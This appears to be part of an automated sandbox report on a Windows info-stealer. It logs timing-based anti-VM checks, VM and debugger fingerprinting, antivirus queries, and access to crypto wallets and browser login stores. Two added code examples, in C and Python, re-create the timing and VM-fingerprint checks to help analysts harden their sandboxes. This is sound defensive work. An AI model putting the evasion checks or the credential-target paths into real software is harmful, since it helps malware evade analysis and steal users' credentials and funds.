          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20940 second address: 4C2094F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2094F second address: 4C20955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20955 second address: 4C20969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20969 second address: 4C2096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2096D second address: 4C20973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20973 second address: 4C209BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007F174075FE89h 0x0000000c and ch, FFFFFFC6h 0x0000000f jmp 00007F174075FE81h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F174075FE7Dh 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C209BC second address: 4C209C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C209C2 second address: 4C209D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F174075FE7Bh 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C209D8 second address: 4C20A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F17414E33FEh 0x00000011 mov esi, dword ptr [ebp+0Ch] 0x00000014 jmp 00007F17414E3400h 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F17414E33FDh 0x00000023 call 00007F17414E3400h 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A3D second address: 4C20A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A43 second address: 4C20A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A47 second address: 4C20A86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F17B248D7D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F174075FE7Dh 0x0000001a xor ch, 00000056h 0x0000001d jmp 00007F174075FE81h 0x00000022 popfd 0x00000023 mov edi, eax 0x00000025 popad 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A86 second address: 4C20A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A8C second address: 4C20A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A90 second address: 4C20AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [769B459Ch], 05h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20AA5 second address: 4C20AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20AAB second address: 4C20B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17414E3405h 0x00000009 and eax, 6BC28F16h 0x0000000f jmp 00007F17414E3401h 0x00000014 popfd 0x00000015 mov ax, 0D87h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007F17B3228DAAh 0x00000022 pushad 0x00000023 mov eax, 5FC7267Fh 0x00000028 jmp 00007F17414E3404h 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20B0B second address: 4C20B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20B0F second address: 4C20B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20B13 second address: 4C20B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20B19 second address: 4C20B1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20B1E second address: 4C20B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F174075FE7Fh 0x00000013 pop esi 0x00000014 mov bh, 1Fh 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20B95 second address: 4C20BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 4E0B38DAh 0x00000008 movsx edi, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov esi, edi 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20BE3 second address: 4C20BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20BE9 second address: 4C20BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20BED second address: 4C20BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20BF1 second address: 4C20C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F17414E3401h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20C0F second address: 4C20C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20C13 second address: 4C20C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
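Each row above is one pair of consecutive RDTSC executions that the sandbox's interceptor saw, with the instructions between them: the sample brackets short, junk-padded stretches of code (push/pop pairs, pushad/popad, jmp chains) with two reads of the time-stamp counter and compares the deltas. Under a debugger, single-stepping emulator or trapping hypervisor those deltas are orders of magnitude larger than on bare metal. The following is an added example written for this report, not the sample's own code and not Joe Sandbox code: it reproduces that check in C so an analyst can see what the rows measure. Assumptions, none of which come from the report: CPUID is used as the bracketed instruction (the sample's brackets contain only ordinary instructions), the 1000-cycle cutoff is illustrative, and x86/x86-64 with GCC or Clang is assumed (a clock-based fallback keeps the file building elsewhere).

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
/* Same counter the sample reads: EDX:EAX after RDTSC. */
static inline uint64_t read_tsc(void) { return __rdtsc(); }
/* The bracketed work. CPUID is chosen (an assumption, not what the sample does)
 * because a hypervisor must trap it, so a VM exit of thousands of cycles lands
 * inside the bracket; on bare metal it costs a few hundred cycles at most. */
static inline void bracketed_work(void) {
    unsigned a = 0, b, c, d;
    __asm__ volatile("cpuid" : "+a"(a), "=b"(b), "=c"(c), "=d"(d));
    (void)b; (void)c; (void)d;
}
#else
/* Non-x86 fallback so the file still builds: nanosecond clock, no CPUID. */
#include <time.h>
static inline uint64_t read_tsc(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
static inline void bracketed_work(void) {}
#endif

/* One rdtsc / work / rdtsc bracket, the shape of every interceptor row above. */
uint64_t sample_delta(void) {
    uint64_t t0 = read_tsc();
    bracketed_work();
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of the deltas, computed on a copy so the caller's array is untouched.
 * Median rather than mean or minimum: one interrupt or context switch inflates
 * a single bare-metal sample, and a sandbox that intercepts RDTSC (as this
 * report's interceptor does) can hand back one implausibly small sample. */
uint64_t median_delta(const uint64_t *deltas, size_t n) {
    if (n == 0) return 0;
    uint64_t *copy = malloc(n * sizeof *copy);
    if (!copy) return 0;
    memcpy(copy, deltas, n * sizeof *copy);
    qsort(copy, n, sizeof *copy, cmp_u64);
    uint64_t med = copy[n / 2];
    free(copy);
    return med;
}

/* Illustrative cutoff (assumption): bare-metal CPUID is typically well under
 * 500 cycles, a trapped one several thousand. The sample's own cutoff is not
 * visible in the report. */
#define VM_CYCLE_THRESHOLD 1000u

/* 1 = timing consistent with a trapping hypervisor, emulator or single-stepper. */
int looks_virtualized(const uint64_t *deltas, size_t n) {
    if (n == 0) return 0;
    return median_delta(deltas, n) > VM_CYCLE_THRESHOLD;
}

int main(void) {
    enum { N = 64 };
    uint64_t deltas[N];
    for (size_t i = 0; i < N; i++) deltas[i] = sample_delta();
    printf("median rdtsc delta: %llu -> %s\n",
           (unsigned long long)median_delta(deltas, N),
           looks_virtualized(deltas, N) ? "likely virtualized or traced" : "looks like bare metal");
    return 0;
}
```

Run it once on the analysis VM and once on a physical host to see the gap the sample relies on. The countermeasure visible in this very report is the "RDTSC instruction interceptor": the sandbox traps RDTSC and hands back controlled values, which is why a robust check (and this example) should use the median of many brackets rather than trust a single pair.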
          Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9BC87C instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9BA276 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B6FBBF instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BE9C11 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
          Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
          Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
          Source: C:\Users\user\Desktop\file.exe TID: 2912 Thread sleep time: -180000s >= -30000s
          Source: C:\Users\user\Desktop\file.exe TID: 4416 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: file.exe, 00000000.00000002.2326254421.0000000000B42000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
          Source: file.exe, 00000000.00000003.2172133728.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2327868106.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325286219.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2327540061.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246523182.0000000000F84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
          Source: file.exe, 00000000.00000003.2194148544.00000000055C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
          Source: file.exe, 00000000.00000003.2217338623.000000000557B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194252257.000000000557E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194042292.000000000557E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2240950831.0000000005582000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246418192.0000000005582000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2217401886.0000000005580000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195121750.000000000557E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194913302.000000000557E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lqeMuUnwoUAFmVCh
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
          Source: file.exe, 00000000.00000002.2326254421.0000000000B42000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
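          The registry values, the ACPI table name and the Win32_BIOS query above are the sample's virtual-machine fingerprint checks. The script below is an added example (not code from the Joe Sandbox report or from the sample) that re-creates those lookups so an analyst can audit whether their own analysis image answers them the way an unhardened VirtualBox or VMware guest would. The hypervisor marker list and the two snapshot dictionaries are assumptions constructed for the example; the live collector is Windows-only and fills the registry artifacts with winreg.

```python
"""Audit a sandbox image for the VM fingerprints this sample checks.

Added example, not code from the Joe Sandbox report or from the sample: it
re-creates the lookups listed above (DriverDesc of the display adapter,
SystemBiosVersion, VideoBiosVersion, the ACPI DSDT\VBOX__ key and Win32_BIOS)
against a snapshot of an image. The vendor markers are the commonly cited ones
and are an assumption, not taken from the sample.
"""
import re

# Logical artifact name -> where the sample reads it (registry path or WMI query).
ARTIFACTS = {
    "display_driver_desc": r"HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 : DriverDesc",
    "system_bios_version": r"HKLM\HARDWARE\DESCRIPTION\System : SystemBiosVersion",
    "video_bios_version": r"HKLM\HARDWARE\DESCRIPTION\System : VideoBiosVersion",
    "acpi_dsdt_vbox": r"HKLM\HARDWARE\ACPI\DSDT\VBOX__ (key exists?)",
    "wmi_bios_manufacturer": r"ROOT\CIMV2 : SELECT Manufacturer FROM Win32_BIOS",
    "wmi_bios_version": r"ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS",
}

# Substrings hypervisors typically leave in these values (assumed, coarse list).
VENDOR_MARKERS = re.compile(r"vmware|vbox|virtualbox|innotek|qemu|bochs|hyper-v|virtual", re.I)


def audit_snapshot(snapshot):
    """Return {artifact: reason} for each artifact that gives the VM away.

    `snapshot` maps artifact name -> value: a string or list of strings
    (REG_MULTI_SZ) for value artifacts, True/False for the presence check,
    None when the key or value does not exist."""
    findings = {}
    for name in ARTIFACTS:
        value = snapshot.get(name)
        if name == "acpi_dsdt_vbox":
            if value:
                findings[name] = "ACPI table VBOX__ is present"
            continue
        if isinstance(value, (list, tuple)):
            value = " ".join(str(v) for v in value)
        if value and VENDOR_MARKERS.search(str(value)):
            findings[name] = f"{value!r} contains a hypervisor marker"
    return findings


def read_live_snapshot():
    """Windows only: collect the registry artifacts with winreg.

    The two Win32_BIOS fields are left as None; fill them from
    `Get-CimInstance Win32_BIOS` (Manufacturer, SMBIOSBIOSVersion)."""
    import winreg  # imported here so the module still loads on non-Windows hosts

    def value_of(path, name):
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
                return winreg.QueryValueEx(key, name)[0]
        except OSError:
            return None

    def key_exists(path):
        try:
            winreg.CloseKey(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path))
            return True
        except OSError:
            return False

    return {
        "display_driver_desc": value_of(r"SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000", "DriverDesc"),
        "system_bios_version": value_of(r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
        "video_bios_version": value_of(r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
        "acpi_dsdt_vbox": key_exists(r"HARDWARE\ACPI\DSDT\VBOX__"),
        "wmi_bios_manufacturer": None,
        "wmi_bios_version": None,
    }


# Constructed snapshots: what an unhardened VirtualBox guest and a laptop might report.
VIRTUALBOX_GUEST = {
    "display_driver_desc": "VirtualBox Graphics Adapter",
    "system_bios_version": ["VBOX   - 1"],
    "video_bios_version": ["Oracle VM VirtualBox Version 7.0"],
    "acpi_dsdt_vbox": True,
    "wmi_bios_manufacturer": "innotek GmbH",
    "wmi_bios_version": "VirtualBox",
}
BARE_METAL = {
    "display_driver_desc": "Intel(R) UHD Graphics 630",
    "system_bios_version": ["LENOVO - 1"],
    "video_bios_version": ["Intel Video BIOS"],
    "acpi_dsdt_vbox": False,
    "wmi_bios_manufacturer": "LENOVO",
    "wmi_bios_version": "N2HET65W (1.48 )",
}

if __name__ == "__main__":
    for label, snap in (("virtualbox", VIRTUALBOX_GUEST), ("bare-metal", BARE_METAL)):
        print(label, audit_snapshot(snap) or "no hypervisor markers")
```

          Every artifact that comes back in `audit_snapshot` is one the sample can read without privileges, so each hit is a reason it may refuse to detonate in that image. The marker list is deliberately coarse ("virtual" alone will match some legitimate driver names), so treat findings as a worklist for hardening the image, not as a verdict.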

          Anti Debugging

          Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
          Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
          Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
          Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
          Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
          Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
          Source: C:\Users\user\Desktop\file.exe | File opened: SICE
          Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
          Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
          Source: file.exe, 00000000.00000002.2326254421.0000000000B42000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
          Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: file.exe, file.exe, 00000000.00000003.2270405791.000000000557D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270385828.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270727454.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          Source: Yara match | File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
          Source: Yara match | File source: sslproxydump.pcap, type: PCAP
          Source: file.exe | String found in binary or memory: %appdata%\Electrum\wallets
          Source: file.exe | String found in binary or memory: %appdata%\ElectronCash\wallets
          Source: file.exe | String found in binary or memory: Jaxx Liberty
          Source: file.exe, 00000000.00000003.2246523182.0000000000F84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
          Source: file.exe | String found in binary or memory: %appdata%\Exodus\exodus.wallet
          Source: file.exe | String found in binary or memory: %appdata%\Exodus\exodus.wallet
          Source: file.exe, 00000000.00000003.2246523182.0000000000F84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
          Source: file.exe, 00000000.00000003.2246370197.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: file.exe, 00000000.00000003.2246340098.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
